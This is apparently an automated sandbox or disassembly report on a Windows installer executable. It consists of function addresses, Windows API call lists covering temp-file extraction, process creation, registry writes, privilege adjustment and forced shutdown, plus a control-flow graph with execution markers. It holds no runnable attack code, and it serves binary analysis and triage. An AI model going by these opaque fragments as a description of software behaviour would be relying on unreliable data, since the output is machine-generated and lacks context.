GetTickCount GetModuleFileNameA 3291->3377 3294 403353 12 API calls 3292->3294 3293->3290 3296 4035b6 3294->3296 3296->3291 3300 4035ba GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3296->3300 3463 406141 lstrcpynA 3297->3463 3298 403604 3304 405b04 CharNextA 3298->3304 3340 40368a 3298->3340 3351 40369a 3298->3351 3302 403353 12 API calls 3300->3302 3306 4035e8 3302->3306 3309 40361f 3304->3309 3306->3291 3306->3351 3307 4037d2 3311 403854 ExitProcess 3307->3311 3312 4037da GetCurrentProcess OpenProcessToken 3307->3312 3308 4036b4 3489 40585d 3308->3489 3314 403665 3309->3314 3315 4036ca 3309->3315 3317 403825 3312->3317 3318 4037f5 LookupPrivilegeValueA AdjustTokenPrivileges 3312->3318 3464 405bc7 3314->3464 3493 4057c8 3315->3493 3321 4064d9 5 API calls 3317->3321 3318->3317 3324 40382c 3321->3324 3325 403841 ExitWindowsEx 3324->3325 3328 40384d 3324->3328 3325->3311 3325->3328 3326 4036e0 lstrcatA 3327 4036eb lstrcatA lstrcmpiA 3326->3327 3330 403707 3327->3330 3327->3351 3513 40140b 3328->3513 3333 403713 3330->3333 3334 40370c 3330->3334 3332 40367f 3479 406141 lstrcpynA 3332->3479 3501 4057ab CreateDirectoryA 3333->3501 3496 40572e CreateDirectoryA 3334->3496 3339 403718 SetCurrentDirectoryA 3341 403732 3339->3341 3342 403727 3339->3342 3407 40395e 3340->3407 3505 406141 lstrcpynA 3341->3505 3504 406141 lstrcpynA 3342->3504 3345 406163 17 API calls 3346 403771 DeleteFileA 3345->3346 3347 40377e CopyFileA 3346->3347 3353 403740 3346->3353 3347->3353 3348 4037c6 3349 405f20 36 API calls 3348->3349 3349->3351 3480 40386c 3351->3480 3352 406163 17 API calls 3352->3353 3353->3345 3353->3348 3353->3352 3355 4037b2 CloseHandle 3353->3355 3506 405f20 MoveFileExA 3353->3506 3510 4057e0 CreateProcessA 3353->3510 3355->3353 3357 40648d wsprintfA LoadLibraryExA 3356->3357 3357->3271 3360 4064f5 3359->3360 3361 4064ff GetProcAddress 3359->3361 3362 40646b 3 API calls 3360->3362 3363 4033f7 3361->3363 3364 4064fb 3362->3364 3363->3275 3364->3361 3364->3363 3365->3281 3366->3283 3368 4063ab 5 API calls 3367->3368 3370 40335f 3368->3370 3369 403369 3369->3289 3370->3369 3516 405ad9 lstrlenA CharPrevA 3370->3516 3373 4057ab 2 API calls 3374 403377 3373->3374 3519 405d09 3374->3519 3523 405cda GetFileAttributesA CreateFileA 3377->3523 3379 402e57 3406 402e64 3379->3406 3524 406141 lstrcpynA 3379->3524 3381 402e7a 3525 405b20 lstrlenA 3381->3525 3385 402e8b GetFileSize 3386 402f85 3385->3386 3405 402ea2 3385->3405 3530 402d75 3386->3530 3390 402fca GlobalAlloc 3393 402fe1 3390->3393 3392 403022 3394 402d75 32 API calls 3392->3394 3396 405d09 2 API calls 3393->3396 3394->3406 3395 402fab 3397 403326 ReadFile 3395->3397 3398 402ff2 CreateFileA 3396->3398 3399 402fb6 3397->3399 3401 40302c 3398->3401 3398->3406 3399->3390 3399->3406 3400 402d75 32 API calls 3400->3405 3544 40333c SetFilePointer 3401->3544 3403 40303a 3545 4030b5 3403->3545 3405->3386 3405->3392 3405->3400 3405->3406 3560 403326 3405->3560 3406->3298 3408 4064d9 5 API calls 3407->3408 3409 403972 3408->3409 3410 403978 3409->3410 3411 40398a 3409->3411 3622 40609f wsprintfA 3410->3622 3412 406028 3 API calls 3411->3412 3413 4039b5 3412->3413 3415 4039d3 lstrcatA 3413->3415 3417 406028 3 API calls 3413->3417 3416 403988 3415->3416 3607 403c23 3416->3607 3417->3415 3420 405bc7 18 API calls 3421 403a05 3420->3421 3422 403a8e 3421->3422 3424 406028 3 API calls 3421->3424 3423 405bc7 18 API calls 3422->3423 3425 403a94 3423->3425 3426 403a31 3424->3426 3427 403aa4 LoadImageA 3425->3427 3428 406163 17 API calls 3425->3428 3426->3422 3432 403a4d lstrlenA 3426->3432 3435 405b04 CharNextA 3426->3435 3429 403b4a 3427->3429 3430 403acb RegisterClassA 3427->3430 3428->3427 3431 40140b 2 API calls 3429->3431 3433 403b01 SystemParametersInfoA CreateWindowExA 3430->3433 3462 403b54 3430->3462 3434 403b50 3431->3434 3436 403a81 3432->3436 3437 403a5b lstrcmpiA 3432->3437 3433->3429 3442 403c23 18 API calls 3434->3442 3434->3462 3440 403a4b 3435->3440 3439 405ad9 3 API calls 3436->3439 3437->3436 3438 403a6b GetFileAttributesA 3437->3438 3441 403a77 3438->3441 3443 403a87 3439->3443 3440->3432 3441->3436 3444 405b20 2 API calls 3441->3444 3445 403b61 3442->3445 3623 406141 lstrcpynA 3443->3623 3444->3436 3447 403bf0 3445->3447 3448 403b6d ShowWindow 3445->3448 3615 40533a OleInitialize 3447->3615 3450 40646b 3 API calls 3448->3450 3452 403b85 3450->3452 3451 403bf6 3453 403c12 3451->3453 3454 403bfa 3451->3454 3455 403b93 GetClassInfoA 3452->3455 3457 40646b 3 API calls 3452->3457 3456 40140b 2 API calls 3453->3456 3460 40140b 2 API calls 3454->3460 3454->3462 3458 403ba7 GetClassInfoA RegisterClassA 3455->3458 3459 403bbd DialogBoxParamA 3455->3459 3456->3462 3457->3455 3458->3459 3461 40140b 2 API calls 3459->3461 3460->3462 3461->3462 3462->3351 3463->3287 3635 406141 lstrcpynA 3464->3635 3466 405bd8 3636 405b72 CharNextA CharNextA 3466->3636 3469 403670 3469->3351 3478 406141 lstrcpynA 3469->3478 3470 4063ab 5 API calls 3476 405bee 3470->3476 3471 405c19 lstrlenA 3472 405c24 3471->3472 3471->3476 3474 405ad9 3 API calls 3472->3474 3475 405c29 GetFileAttributesA 3474->3475 3475->3469 3476->3469 3476->3471 3477 405b20 2 API calls 3476->3477 3642 406444 FindFirstFileA 3476->3642 3477->3471 3478->3332 3479->3340 3481 403887 3480->3481 3482 40387d CloseHandle 3480->3482 3483 403891 CloseHandle 3481->3483 3484 40389b 3481->3484 3482->3481 3483->3484 3645 4038c9 3484->3645 3490 405872 3489->3490 3491 405886 MessageBoxIndirectA 3490->3491 3492 4036c2 ExitProcess 3490->3492 3491->3492 3494 4064d9 5 API calls 3493->3494 3495 4036cf lstrcatA 3494->3495 3495->3326 3495->3327 3497 403711 3496->3497 3498 40577f GetLastError 3496->3498 3497->3339 3498->3497 3499 40578e SetFileSecurityA 3498->3499 3499->3497 3500 4057a4 GetLastError 3499->3500 3500->3497 3502 4057bf GetLastError 3501->3502 3503 4057bb 3501->3503 3502->3503 3503->3339 3504->3341 3505->3353 3507 405f41 3506->3507 3508 405f34 3506->3508 3507->3353 3703 405db0 3508->3703 3511 405813 CloseHandle 3510->3511 3512 40581f 3510->3512 3511->3512 3512->3353 3514 401389 2 API calls 3513->3514 3515 401420 3514->3515 3515->3311 3517 405af3 lstrcatA 3516->3517 3518 403371 3516->3518 3517->3518 3518->3373 3520 405d14 GetTickCount GetTempFileNameA 3519->3520 3521 405d41 3520->3521 3522 403382 3520->3522 3521->3520 3521->3522 3522->3289 3523->3379 3524->3381 3526 405b2d 3525->3526 3527 405b32 CharPrevA 3526->3527 3528 402e80 3526->3528 3527->3526 3527->3528 3529 406141 lstrcpynA 3528->3529 3529->3385 3531 402d83 3530->3531 3532 402d9b 3530->3532 3533 402d8c DestroyWindow 3531->3533 3543 402d93 3531->3543 3534 402da3 3532->3534 3535 402dab GetTickCount 3532->3535 3533->3543 3578 406515 3534->3578 3537 402db9 3535->3537 3535->3543 3538 402dc1 3537->3538 3539 402dee CreateDialogParamA ShowWindow 3537->3539 3538->3543 3564 402d59 3538->3564 3539->3543 3541 402dcf wsprintfA 3567 405268 3541->3567 3543->3390 3543->3406 3563 40333c SetFilePointer 3543->3563 3544->3403 3546 4030e0 3545->3546 3547 4030c4 SetFilePointer 3545->3547 3582 4031bd GetTickCount 3546->3582 3547->3546 3552 4031bd 42 API calls 3553 403117 3552->3553 3554 403183 ReadFile 3553->3554 3556 40317d 3553->3556 3559 403126 3553->3559 3554->3556 3556->3406 3557 405d52 ReadFile 3557->3559 3559->3556 3559->3557 3597 405d81 WriteFile 3559->3597 3561 405d52 ReadFile 3560->3561 3562 403339 3561->3562 3562->3405 3563->3395 3565 402d68 3564->3565 3566 402d6a MulDiv 3564->3566 3565->3566 3566->3541 3568 405326 3567->3568 3569 405283 3567->3569 3568->3543 3570 4052a0 lstrlenA 3569->3570 3571 406163 17 API calls 3569->3571 3572 4052c9 3570->3572 3573 4052ae lstrlenA 3570->3573 3571->3570 3574 4052dc 3572->3574 3575 4052cf SetWindowTextA 3572->3575 3573->3568 3576 4052c0 lstrcatA 3573->3576 3574->3568 3577 4052e2 SendMessageA SendMessageA SendMessageA 3574->3577 3575->3574 3576->3572 3577->3568 3579 406532 PeekMessageA 3578->3579 3580 406542 3579->3580 3581 406528 DispatchMessageA 3579->3581 3580->3543 3581->3579 3583 403315 3582->3583 3584 4031eb 3582->3584 3585 402d75 32 API calls 3583->3585 3599 40333c SetFilePointer 3584->3599 3587 4030e7 3585->3587 3587->3556 3595 405d52 ReadFile 3587->3595 3588 4031f6 SetFilePointer 3592 40321b 3588->3592 3589 403326 ReadFile 3589->3592 3591 402d75 32 API calls 3591->3592 3592->3587 3592->3589 3592->3591 3593 405d81 WriteFile 3592->3593 3594 4032f6 SetFilePointer 3592->3594 3600 40661e 3592->3600 3593->3592 3594->3583 3596 403100 3595->3596 3596->3552 3596->3556 3598 405d9f 3597->3598 3598->3559 3599->3588 3601 406643 3600->3601 3604 40664b 3600->3604 3601->3592 3602 4066d2 GlobalFree 3603 4066db GlobalAlloc 3602->3603 3603->3601 3603->3604 3604->3601 3604->3602 3604->3603 3605 406752 GlobalAlloc 3604->3605 3606 406749 GlobalFree 3604->3606 3605->3601 3605->3604 3606->3605 3608 403c37 3607->3608 3624 40609f wsprintfA 3608->3624 3610 403ca8 3625 403cdc 3610->3625 3612 4039e3 3612->3420 3613 403cad 3613->3612 3614 406163 17 API calls 3613->3614 3614->3613 3628 40421b 3615->3628 3617 405384 3618 40421b SendMessageA 3617->3618 3620 405396 OleUninitialize 3618->3620 3619 40535d 3619->3617 3631 401389 3619->3631 3620->3451 3622->3416 3623->3422 3624->3610 3626 406163 17 API calls 3625->3626 3627 403cea SetWindowTextA 3626->3627 3627->3613 3629 404233 3628->3629 3630 404224 SendMessageA 3628->3630 3629->3619 3630->3629 3633 401390 3631->3633 3632 4013fe 3632->3619 3633->3632 3634 4013cb MulDiv SendMessageA 3633->3634 3634->3633 3635->3466 3637 405b8d 3636->3637 3640 405b9d 3636->3640 3639 405b98 CharNextA 3637->3639 3637->3640 3638 405bbd 3638->3469 3638->3470 3639->3638 3640->3638 3641 405b04 CharNextA 3640->3641 3641->3640 3643 406465 3642->3643 3644 40645a FindClose 3642->3644 3643->3476 3644->3643 3646 4038d7 3645->3646 3647 4038a0 3646->3647 3648 4038dc FreeLibrary GlobalFree 3646->3648 3649 405909 3647->3649 3648->3647 3648->3648 3650 405bc7 18 API calls 3649->3650 3651 405929 3650->3651 3652 405931 DeleteFileA 3651->3652 3653 405948 3651->3653 3654 4036a3 OleUninitialize 3652->3654 3655 405a80 3653->3655 3690 406141 lstrcpynA 3653->3690 3654->3307 3654->3308 3655->3654 3660 406444 2 API calls 3655->3660 3657 40596e 3658 405981 3657->3658 3659 405974 lstrcatA 3657->3659 3662 405b20 2 API calls 3658->3662 3661 405987 3659->3661 3665 405a9a 3660->3665 3663 405995 lstrcatA 3661->3663 3664 40598c 3661->3664 3662->3661 3666 4059a0 lstrlenA FindFirstFileA 3663->3666 3664->3663 3664->3666 3665->3654 3667 405a9e 3665->3667 3668 405a76 3666->3668 3677 4059c4 3666->3677 3669 405ad9 3 API calls 3667->3669 3668->3655 3671 405aa4 3669->3671 3670 405b04 CharNextA 3670->3677 3672 4058c1 5 API calls 3671->3672 3673 405ab0 3672->3673 3674 405ab4 3673->3674 3675 405aca 3673->3675 3674->3654 3681 405268 24 API calls 3674->3681 3676 405268 24 API calls 3675->3676 3676->3654 3677->3670 3678 405a55 FindNextFileA 3677->3678 3685 405909 60 API calls 3677->3685 3687 405268 24 API calls 3677->3687 3688 405268 24 API calls 3677->3688 3689 405f20 36 API calls 3677->3689 3691 406141 lstrcpynA 3677->3691 3692 4058c1 3677->3692 3678->3677 3680 405a6d FindClose 3678->3680 3680->3668 3682 405ac1 3681->3682 3683 405f20 36 API calls 3682->3683 3686 405ac8 3683->3686 3685->3677 3686->3654 3687->3678 3688->3677 3689->3677 3690->3657 3691->3677 3700 405cb5 GetFileAttributesA 3692->3700 3695 4058ee 3695->3677 3696 4058e4 DeleteFileA 3698 4058ea 3696->3698 3697 4058dc RemoveDirectoryA 3697->3698 3698->3695 3699 4058fa SetFileAttributesA 3698->3699 3699->3695 3701 4058cd 3700->3701 3702 405cc7 SetFileAttributesA 3700->3702 3701->3695 3701->3696 3701->3697 3702->3701 3704 405dd6 3703->3704 3705 405dfc GetShortPathNameA 3703->3705 3730 405cda GetFileAttributesA CreateFileA 3704->3730 3707 405e11 3705->3707 3708 405f1b 3705->3708 3707->3708 3710 405e19 wsprintfA 3707->3710 3708->3507 3709 405de0 CloseHandle GetShortPathNameA 3709->3708 3711 405df4 3709->3711 3712 406163 17 API calls 3710->3712 3711->3705 3711->3708 3713 405e41 3712->3713 3731 405cda GetFileAttributesA CreateFileA 3713->3731 3715 405e4e 3715->3708 3716 405e5d GetFileSize GlobalAlloc 3715->3716 3717 405f14 CloseHandle 3716->3717 3718 405e7f 3716->3718 3717->3708 3719 405d52 ReadFile 3718->3719 3720 405e87 3719->3720 3720->3717 3732 405c3f lstrlenA 3720->3732 3723 405eb2 3725 405c3f 4 API calls 3723->3725 3724 405e9e lstrcpyA 3726 405ec0 3724->3726 3725->3726 3727 405ef7 SetFilePointer 3726->3727 3728 405d81 WriteFile 3727->3728 3729 405f0d GlobalFree 3728->3729 3729->3717 3730->3709 3731->3715 3733 405c80 lstrlenA 3732->3733 3734 405c88 3733->3734 3735 405c59 lstrcmpiA 3733->3735 3734->3723 3734->3724 3735->3734 3736 405c77 CharNextA 3735->3736 3736->3733 4539 404305 lstrcpynA lstrlenA 4540 401c0a 4541 402b0a 17 API calls 4540->4541 4542 401c11 4541->4542 4543 402b0a 17 API calls 4542->4543 4544 401c1e 4543->4544 4545 401c33 4544->4545 4546 402b2c 17 API calls 4544->4546 4547 402b2c 17 API calls 4545->4547 4551 401c43 4545->4551 4546->4545 4547->4551 4548 401c9a 4550 402b2c 17 API calls 4548->4550 4549 401c4e 4552 402b0a 17 API calls 4549->4552 4553 401c9f 4550->4553 4551->4548 4551->4549 4554 401c53 4552->4554 4555 402b2c 17 API calls 4553->4555 4556 402b0a 17 API calls 4554->4556 4557 401ca8 FindWindowExA 4555->4557 4558 401c5f 4556->4558 4561 401cc6 4557->4561 4559 401c8a SendMessageA 4558->4559 4560 401c6c SendMessageTimeoutA 4558->4560 4559->4561 4560->4561 3911 401e8f 3919 402b0a 3911->3919 3913 401e95 3914 402b0a 17 API calls 3913->3914 3915 401ea1 3914->3915 3916 401eb8 EnableWindow 3915->3916 3917 401ead ShowWindow 3915->3917 3918 4029b8 3916->3918 3917->3918 3920 406163 17 API calls 3919->3920 3921 402b1f 3920->3921 3921->3913 4569 401490 4570 405268 24 API calls 4569->4570 4571 401497 4570->4571 4572 402993 SendMessageA 4573 4029b8 4572->4573 4574 4029ad InvalidateRect 4572->4574 4574->4573 4575 401f98 4576 402b2c 17 API calls 4575->4576 4577 401f9f 4576->4577 4578 406444 2 API calls 4577->4578 4579 401fa5 4578->4579 4581 401fb7 4579->4581 4582 40609f wsprintfA 4579->4582 4582->4581 4590 40461a 4591 404650 4590->4591 4592 40462a 4590->4592 4594 404236 8 API calls 4591->4594 4593 4041cf 18 API calls 4592->4593 4595 404637 SetDlgItemTextA 4593->4595 4596 40465c 4594->4596 4595->4591 4597 40391c 4598 403927 4597->4598 4599 40392e GlobalAlloc 4598->4599 4600 40392b 4598->4600 4599->4600 4089 40159d 4090 402b2c 17 API calls 4089->4090 4091 4015a4 SetFileAttributesA 4090->4091 4092 4015b6 4091->4092 4601 40149d 4602 4014ab PostQuitMessage 4601->4602 4603 40234e 4601->4603 4602->4603 4604 401a1e 4605 402b2c 17 API calls 4604->4605 4606 401a27 ExpandEnvironmentStringsA 4605->4606 4607 401a3b 4606->4607 4609 401a4e 4606->4609 4608 401a40 lstrcmpA 4607->4608 4607->4609 4608->4609 4615 40171f 4616 402b2c 17 API calls 4615->4616 4617 401726 SearchPathA 4616->4617 4618 401741 4617->4618 4619 401d20 4620 402b0a 17 API calls 4619->4620 4621 401d2e SetWindowLongA 4620->4621 4622 4029b8 4621->4622 3205 73402921 3206 73402971 3205->3206 3207 73402931 VirtualProtect 3205->3207 3207->3206 4623 402721 4624 402727 4623->4624 4625 4029b8 4624->4625 4626 40272f FindClose 4624->4626 4626->4625 4627 4027a3 4628 402b2c 17 API calls 4627->4628 4629 4027b1 4628->4629 4630 4027c7 4629->4630 4631 402b2c 17 API calls 4629->4631 4632 405cb5 2 API calls 4630->4632 4631->4630 4633 4027cd 4632->4633 4655 405cda GetFileAttributesA CreateFileA 4633->4655 4635 4027da 4636 4027e6 GlobalAlloc 4635->4636 4637 40287d 4635->4637 4638 402874 CloseHandle 4636->4638 4639 4027ff 4636->4639 4640 402885 DeleteFileA 4637->4640 4641 402898 4637->4641 4638->4637 4656 40333c SetFilePointer 4639->4656 4640->4641 4643 402805 4644 403326 ReadFile 4643->4644 4645 40280e GlobalAlloc 4644->4645 4646 402852 4645->4646 4647 40281e 4645->4647 4649 405d81 WriteFile 4646->4649 4648 4030b5 44 API calls 4647->4648 4654 40282b 4648->4654 4650 40285e GlobalFree 4649->4650 4651 4030b5 44 API calls 4650->4651 4653 402871 4651->4653 4652 402849 GlobalFree 4652->4646 4653->4638 4654->4652 4655->4635 4656->4643 3743 4053a6 3744 405551 3743->3744 3745 4053c8 GetDlgItem GetDlgItem GetDlgItem 3743->3745 3747 405581 3744->3747 3748 405559 GetDlgItem CreateThread CloseHandle 3744->3748 3789 404204 SendMessageA 3745->3789 3750 4055af 3747->3750 3751 4055d0 3747->3751 3752 405597 ShowWindow ShowWindow 3747->3752 3748->3747 3812 40533a 5 API calls 3748->3812 3749 405438 3757 40543f GetClientRect GetSystemMetrics SendMessageA SendMessageA 3749->3757 3753 4055b7 3750->3753 3758 40560a 3750->3758 3798 404236 3751->3798 3794 404204 SendMessageA 3752->3794 3754 4055e3 ShowWindow 3753->3754 3755 4055bf 3753->3755 3762 405603 3754->3762 3763 4055f5 3754->3763 3795 4041a8 3755->3795 3764 405491 SendMessageA SendMessageA 3757->3764 3765 4054ad 3757->3765 3758->3751 3766 405617 SendMessageA 3758->3766 3761 4055dc 3768 4041a8 SendMessageA 3762->3768 3767 405268 24 API calls 3763->3767 3764->3765 3769 4054c0 3765->3769 3770 4054b2 SendMessageA 3765->3770 3766->3761 3771 405630 CreatePopupMenu 3766->3771 3767->3762 3768->3758 3790 4041cf 3769->3790 3770->3769 3772 406163 17 API calls 3771->3772 3775 405640 AppendMenuA 3772->3775 3774 4054d0 3778 4054d9 ShowWindow 3774->3778 3779 40550d GetDlgItem SendMessageA 3774->3779 3776 405671 TrackPopupMenu 3775->3776 3777 40565e GetWindowRect 3775->3777 3776->3761 3780 40568d 3776->3780 3777->3776 3781 4054fc 3778->3781 3782 4054ef ShowWindow 3778->3782 3779->3761 3783 405534 SendMessageA SendMessageA 3779->3783 3784 4056ac SendMessageA 3780->3784 3793 404204 SendMessageA 3781->3793 3782->3781 3783->3761 3784->3784 3785 4056c9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3784->3785 3787 4056eb SendMessageA 3785->3787 3787->3787 3788 40570d GlobalUnlock SetClipboardData CloseClipboard 3787->3788 3788->3761 3789->3749 3791 406163 17 API calls 3790->3791 3792 4041da SetDlgItemTextA 3791->3792 3792->3774 3793->3779 3794->3750 3796 4041b5 SendMessageA 3795->3796 3797 4041af 3795->3797 3796->3751 3797->3796 3799 4042f9 3798->3799 3800 40424e GetWindowLongA 3798->3800 3799->3761 3800->3799 3801 404263 3800->3801 3801->3799 3802 404290 GetSysColor 3801->3802 3803 404293 3801->3803 3802->3803 3804 4042a3 SetBkMode 3803->3804 3805 404299 SetTextColor 3803->3805 3806 4042c1 3804->3806 3807 4042bb GetSysColor 3804->3807 3805->3804 3808 4042c8 SetBkColor 3806->3808 3809 4042d2 3806->3809 3807->3806 3808->3809 3809->3799 3810 4042e5 DeleteObject 3809->3810 3811 4042ec CreateBrushIndirect 3809->3811 3810->3811 3811->3799 3813 4023a7 3814 402b2c 17 API calls 3813->3814 3815 4023b8 3814->3815 3816 402b2c 17 API calls 3815->3816 3817 4023c1 3816->3817 3818 402b2c 17 API calls 3817->3818 3819 4023cb GetPrivateProfileStringA 3818->3819 3922 402631 3923 402b0a 17 API calls 3922->3923 3928 40263b 3923->3928 3924 4026a9 3925 405d52 ReadFile 3925->3928 3926 4026ab 3931 40609f wsprintfA 3926->3931 3928->3924 3928->3925 3928->3926 3929 4026bb 3928->3929 3929->3924 3930 4026d1 SetFilePointer 3929->3930 3930->3924 3931->3924 3932 4022b2 3933 402b2c 17 API calls 3932->3933 3934 4022b8 3933->3934 3935 402b2c 17 API calls 3934->3935 3936 4022c1 3935->3936 3937 402b2c 17 API calls 3936->3937 3938 4022ca 3937->3938 3939 406444 2 API calls 3938->3939 3940 4022d3 3939->3940 3941 4022e4 lstrlenA lstrlenA 3940->3941 3945 4022d7 3940->3945 3942 405268 24 API calls 3941->3942 3944 402320 SHFileOperationA 3942->3944 3943 405268 24 API calls 3946 4022df 3943->3946 3944->3945 3944->3946 3945->3943 3945->3946 4664 4049b2 4665 4049c2 4664->4665 4666 4049de 4664->4666 4675 405841 GetDlgItemTextA 4665->4675 4668 404a11 4666->4668 4669 4049e4 SHGetPathFromIDListA 4666->4669 4671 4049f4 4669->4671 4674 4049fb SendMessageA 4669->4674 4670 4049cf SendMessageA 4670->4666 4672 40140b 2 API calls 4671->4672 4672->4674 4674->4668 4675->4670 4676 402334 4677 40233b 4676->4677 4681 40234e 4676->4681 4678 406163 17 API calls 4677->4678 4679 402348 4678->4679 4680 40585d MessageBoxIndirectA 4679->4680 4680->4681 4682 4014b7 4683 4014bd 4682->4683 4684 401389 2 API calls 4683->4684 4685 4014c5 4684->4685 4686 402138 4687 402b2c 17 API calls 4686->4687 4688 40213f 4687->4688 4689 402b2c 17 API calls 4688->4689 4690 402149 4689->4690 4691 402b2c 17 API calls 4690->4691 4692 402153 4691->4692 4693 402b2c 17 API calls 4692->4693 4694 40215d 4693->4694 4695 402b2c 17 API calls 4694->4695 4696 402167 4695->4696 4697 4021a9 CoCreateInstance 4696->4697 4698 402b2c 17 API calls 4696->4698 4699 4021c8 4697->4699 4703 402273 4697->4703 4698->4697 4702 402253 MultiByteToWideChar 4699->4702 4699->4703 4700 401423 24 API calls 4701 4022a9 4700->4701 4702->4703 4703->4700 4703->4701 4704 40433a 4705 404350 4704->4705 4713 40445c 4704->4713 4707 4041cf 18 API calls 4705->4707 4706 4044cb 4708 404595 4706->4708 4709 4044d5 GetDlgItem 4706->4709 4710 4043a6 4707->4710 4715 404236 8 API calls 4708->4715 4711 404553 4709->4711 4712 4044eb 4709->4712 4714 4041cf 18 API calls 4710->4714 4711->4708 4719 404565 4711->4719 4712->4711 4718 404511 SendMessageA LoadCursorA SetCursor 4712->4718 4713->4706 4713->4708 4716 4044a0 GetDlgItem SendMessageA 4713->4716 4717 4043b3 CheckDlgButton 4714->4717 4729 404590 4715->4729 4737 4041f1 KiUserCallbackDispatcher 4716->4737 4735 4041f1 KiUserCallbackDispatcher 4717->4735 4738 4045de 4718->4738 4724 40456b SendMessageA 4719->4724 4725 40457c 4719->4725 4721 4044c6 4726 4045ba SendMessageA 4721->4726 4724->4725 4725->4729 4730 404582 SendMessageA 4725->4730 4726->4706 4727 4043d1 GetDlgItem 4736 404204 SendMessageA 4727->4736 4730->4729 4732 4043e7 SendMessageA 4733 404405 GetSysColor 4732->4733 4734 40440e SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4732->4734 4733->4734 4734->4729 4735->4727 4736->4732 4737->4721 4741 405823 ShellExecuteExA 4738->4741 4740 404544 LoadCursorA SetCursor 4740->4711 4741->4740 4069 4015bb 4070 402b2c 17 API calls 4069->4070 4071 4015c2 4070->4071 4072 405b72 4 API calls 4071->4072 4085 4015ca 4072->4085 4073 401624 4075 401652 4073->4075 4076 401629 4073->4076 4074 405b04 CharNextA 4074->4085 4078 401423 24 API calls 4075->4078 4077 401423 24 API calls 4076->4077 4079 401630 4077->4079 4084 40164a 4078->4084 4088 406141 lstrcpynA 4079->4088 4080 4057ab 2 API calls 4080->4085 4082 4057c8 5 API calls 4082->4085 4083 40163b SetCurrentDirectoryA 4083->4084 4085->4073 4085->4074 4085->4080 4085->4082 4086 40160c GetFileAttributesA 4085->4086 4087 40572e 4 API calls 4085->4087 4086->4085 4087->4085 4088->4083 4742 40273b 4743 402741 4742->4743 4744 402745 FindNextFileA 4743->4744 4746 402757 4743->4746 4745 402796 4744->4745 4744->4746 4748 406141 lstrcpynA 4745->4748 4748->4746 4749 4016bb 4750 402b2c 17 API calls 4749->4750 4751 4016c1 GetFullPathNameA 4750->4751 4752 4016f9 4751->4752 4753 4016d8 4751->4753 4754 4029b8 4752->4754 4755 40170d GetShortPathNameA 4752->4755 4753->4752 4756 406444 2 API calls 4753->4756 4755->4754 4757 4016e9 4756->4757 4757->4752 4759 406141 lstrcpynA 4757->4759 4759->4752 4093 40243d 4094 402b2c 17 API calls 4093->4094 4095 40244f 4094->4095 4096 402b2c 17 API calls 4095->4096 4097 402459 4096->4097 4110 402bbc 4097->4110 4100 40248e 4103 40249a 4100->4103 4105 402b0a 17 API calls 4100->4105 4101 4029b8 4102 402b2c 17 API calls 4104 402487 lstrlenA 4102->4104 4106 4024b9 RegSetValueExA 4103->4106 4108 4030b5 44 API calls 4103->4108 4104->4100 4105->4103 4107 4024cf RegCloseKey 4106->4107 4107->4101 4108->4106 4111 402bd7 4110->4111 4114 405ff5 4111->4114 4115 406004 4114->4115 4116 402469 4115->4116 4117 40600f RegCreateKeyExA 4115->4117 4116->4100 4116->4101 4116->4102 4117->4116 4760 401b3f 4761 402b2c 17 API calls 4760->4761 4762 401b46 4761->4762 4763 402b0a 17 API calls 4762->4763 4764 401b4f wsprintfA 4763->4764 4765 4029b8 4764->4765

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 403384-4033c3 SetErrorMode GetVersion 1 4033c5-4033cd call 4064d9 0->1 2 4033d6 0->2 1->2 7 4033cf 1->7 4 4033db-4033ee call 40646b lstrlenA 2->4 9 4033f0-40340c call 4064d9 * 3 4->9 7->2 16 40341d-40347b #17 OleInitialize SHGetFileInfoA call 406141 GetCommandLineA call 406141 9->16 17 40340e-403414 9->17 24 403487-40349c call 405b04 CharNextA 16->24 25 40347d-403482 16->25 17->16 21 403416 17->21 21->16 28 403561-403565 24->28 25->24 29 4034a1-4034a4 28->29 30 40356b 28->30 32 4034a6-4034aa 29->32 33 4034ac-4034b4 29->33 31 40357e-403598 GetTempPathA call 403353 30->31 42 4035f0-40360a DeleteFileA call 402e14 31->42 43 40359a-4035b8 GetWindowsDirectoryA lstrcatA call 403353 31->43 32->32 32->33 34 4034b6-4034b7 33->34 35 4034bc-4034bf 33->35 34->35 37 403551-40355e call 405b04 35->37 38 4034c5-4034c9 35->38 37->28 57 403560 37->57 40 4034e1-40350e 38->40 41 4034cb-4034d1 38->41 47 403510-403516 40->47 48 403521-40354f 40->48 45 4034d3-4034d5 41->45 46 4034d7 41->46 58 403610-403616 42->58 59 40369e-4036ae call 40386c OleUninitialize 42->59 43->42 61 4035ba-4035ea GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403353 43->61 45->40 45->46 46->40 52 403518-40351a 47->52 53 40351c 47->53 48->37 55 40356d-403579 call 406141 48->55 52->48 52->53 53->48 55->31 57->28 62 403618-403623 call 405b04 58->62 63 40368e-403695 call 40395e 58->63 72 4037d2-4037d8 59->72 73 4036b4-4036c4 call 40585d ExitProcess 59->73 61->42 61->59 74 403625-40364e 62->74 75 403659-403663 62->75 70 40369a 63->70 70->59 77 403854-40385c 72->77 78 4037da-4037f3 GetCurrentProcess OpenProcessToken 72->78 79 403650-403652 74->79 82 403665-403672 call 405bc7 75->82 83 4036ca-4036de call 4057c8 lstrcatA 75->83 80 403862-403866 ExitProcess 77->80 81 40385e 77->81 85 403825-403833 call 4064d9 78->85 86 4037f5-40381f LookupPrivilegeValueA AdjustTokenPrivileges 78->86 79->75 87 403654-403657 79->87 81->80 82->59 96 403674-40368a call 406141 * 2 82->96 97 4036e0-4036e6 lstrcatA 83->97 98 4036eb-403705 lstrcatA lstrcmpiA 83->98 94 403841-40384b ExitWindowsEx 85->94 95 403835-40383f 85->95 86->85 87->75 87->79 94->77 99 40384d-40384f call 40140b 94->99 95->94 95->99 96->63 97->98 98->59 101 403707-40370a 98->101 99->77 105 403713 call 4057ab 101->105 106 40370c-403711 call 40572e 101->106 111 403718-403725 SetCurrentDirectoryA 105->111 106->111 113 403732-40375a call 406141 111->113 114 403727-40372d call 406141 111->114 118 403760-40377c call 406163 DeleteFileA 113->118 114->113 121 4037bd-4037c4 118->121 122 40377e-40378e CopyFileA 118->122 121->118 123 4037c6-4037cd call 405f20 121->123 122->121 124 403790-4037b0 call 405f20 call 406163 call 4057e0 122->124 123->59 124->121 133 4037b2-4037b9 CloseHandle 124->133 133->121
                                                  APIs
